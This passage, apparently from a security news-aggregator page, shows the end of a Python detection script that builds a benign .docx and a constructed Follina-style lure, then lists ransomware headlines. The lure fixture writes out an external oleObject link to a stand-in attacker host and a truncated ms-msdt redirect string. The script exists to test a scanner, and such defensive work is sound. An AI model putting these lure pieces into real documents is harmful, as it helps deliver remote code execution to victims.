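                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
        for part_name, part_blob in (extra_parts or {}).items():
            zf.writestr(part_name, part_blob)
    return buf.getvalue()


# Ordinary document: an internal styles part plus an external hyperlink.
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>'
    "</Relationships>"
)

# Constructed lure: an external oleObject pointing at a remote HTML page
# (host and ID made up), the shape of the Follina delivery document.
LURE_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId996" Type="{OLE_REL}" Target="http://attacker.invalid/stage.html!" TargetMode="External"/>'
    "</Relationships>"
)

# Constructed stand-in for a cached second stage inside the package.
STAGE_HTML = b'<script>window.location.href = "ms-msdt:/id PCWDiagnostic ...";</script>'

if __name__ == "__main__":
    for label, pkg in (("benign", make_docx(BENIGN_RELS)),
                       ("lure", make_docx(LURE_RELS, {"word/embeddings/stage.html": STAGE_HTML}))):
        print(label, scan_docx(pkg) or "clean")
```

Run it over mail-gateway attachments or a quarantine folder; the relationship check catches the lure before any network fetch happens, whereas the ms-msdt: string only appears once the remote stage has been retrieved, so a clean result from the second check alone says nothing.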
InfoSecurityMag.webp 2022-05-31 16:00:00 Magniber Ransomware Now Targets Windows 11 Machines (direct link) Magniber ransomware upgraded to prompt fake Windows 11 updates Ransomware
Fortinet.webp 2022-05-31 13:43:00 Paying Ransomware? Should You Really Pay Ransom Settlements? (direct link) Ransomware is one of the top threats facing organizations and individuals today. While organizations may often feel compelled to pay ransom settlements, it is a decision that should be considered very carefully. Read more. Ransomware Threat
bleepingcomputer.webp 2022-05-31 13:34:25 Costa Rica's public health agency hit by Hive ransomware (direct link) All computer systems on the network of Costa Rica's public health service (known as the Costa Rican Social Security Fund or CCSS) are now offline following a Hive ransomware attack that hit them this morning. [...] Ransomware
Last update at: 2024-07-20 23:09:47